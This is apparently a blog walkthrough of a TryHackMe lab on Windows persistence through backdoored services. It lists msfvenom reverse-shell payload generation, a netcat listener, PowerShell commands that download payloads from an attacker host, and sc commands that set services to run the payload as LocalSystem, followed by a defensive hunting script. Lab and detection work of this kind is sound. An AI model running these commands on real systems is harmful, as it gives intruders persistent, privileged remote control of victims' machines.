In this post, we cover the third part of Windows Persistence Techniques, specifically backdooring Windows services, as part of the TryHackMe Windows Local Persistence room.
Windows services offer a great way to establish persistence since they can be configured to run in the background whenever the victim machine is started. If we can leverage any service to run something for us, we can regain control of the victim machine each time it is started.
A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.
There are two main ways we can abuse services to establish persistence:
- Create a new service
- Modify an existing one to execute our payload.
Method 1: Creating a Backdoor Service
My first approach is to create a new service that runs a malicious payload. I’ll use a tool called msfvenom to generate a payload, which is an executable file that will give me a reverse shell. Then, I’ll create a new service and configure it to run this payload automatically on startup.
The downside to this method is that a new, unfamiliar service might look suspicious to a system administrator or anyone investigating a potential security breach.
Method 2: Backdooring an Existing Service
My second method is a bit stealthier. Instead of creating a new service, I’ll modify an existing, legitimate one. I’ll change the service’s “binary path” to point to my malicious payload instead of its original executable. I’ll also set the service to start automatically and change its start name to LocalSystem to ensure it has full administrative privileges. This way, my backdoor is hidden within a service that’s expected to be running on the system.
Technical Commands
Here are the commands I used in the terminal throughout the video:
Creating a new service:
sc.exe create THMservice2 binPath= "C:\Users\IEUser\Desktop\payload.exe" start= auto
sc start THMservice2
Creating a payload with msfvenom:
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload.exe
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload_v2.exe
Setting up a Netcat listener:
nc -lvp 4545
Downloading a payload with PowerShell:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload.exe','C:\Users\IEUser\Desktop\payload.exe')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload_v2.exe','C:\Users\IEUser\Desktop\payload_v2.exe')"
Enumerating services:
sc query state= all
sc query THMservice3
sc qc THMservice3
Reconfiguring an existing service:
sc config THMservice3 binPath= "C:\Users\IEUser\Desktop\payload_v2.exe" start= auto obj= LocalSystem
sc start THMservice3
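From the defender's side, both methods leave the same footprint: a service whose binary sits somewhere unusual (here a user's Desktop), set to auto-start as LocalSystem. The following PowerShell is an added hunting example, not part of the original post or the TryHackMe room; it assumes you run it as an administrator on the host being inspected, and it treats the Windows and Program Files directories as the only trusted locations for service binaries.

```powershell
# Added example (not from the original post): flag services that match the
# backdoor pattern described above and list recently installed services.
# Trusted roots are an assumption; adjust them for your own build standard.
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")

function Get-SuspiciousServices {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        # Isolate the executable from its quoting and arguments.
        $exe = if ($path.StartsWith('"')) { $path.Split('"')[1] } else { $path.Split(' ')[0] }
        $inTrustedRoot = $false
        foreach ($root in $trustedRoots) {
            if ($root.Length -gt 1 -and
                $exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $inTrustedRoot = $true
            }
        }
        $reasons = @()
        if (-not $inTrustedRoot) { $reasons += "binary outside trusted roots ($exe)" }
        if ($_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' -and -not $inTrustedRoot) {
            $reasons += 'auto-start as LocalSystem'
        }
        if ($reasons.Count -gt 0) {
            [PSCustomObject]@{
                Name = $_.Name; Path = $exe; StartMode = $_.StartMode
                RunAs = $_.StartName; Reasons = ($reasons -join '; ')
            }
        }
    }
}

# Event ID 7045 in the System log records every newly installed service
# (property order: name, image path, type, start type, account).
function Get-RecentServiceInstalls([int]$Days = 7) {
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) } `
        -ErrorAction SilentlyContinue | ForEach-Object {
        [PSCustomObject]@{
            Time = $_.TimeCreated; Service = $_.Properties[0].Value
            Path = $_.Properties[1].Value; Account = $_.Properties[4].Value
        }
    }
}

Get-SuspiciousServices | Format-Table -AutoSize
Get-RecentServiceInstalls | Format-Table -AutoSize
```

Method 2 (reconfiguring an existing service with `sc config`) does not raise a 7045 event, so the path check matters there: compare each service's current binary path against a known-good baseline rather than relying on the install event alone.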
TryHackMe Windows Local Persistence Room Answers
Insert flag8 here
Very useful information thanks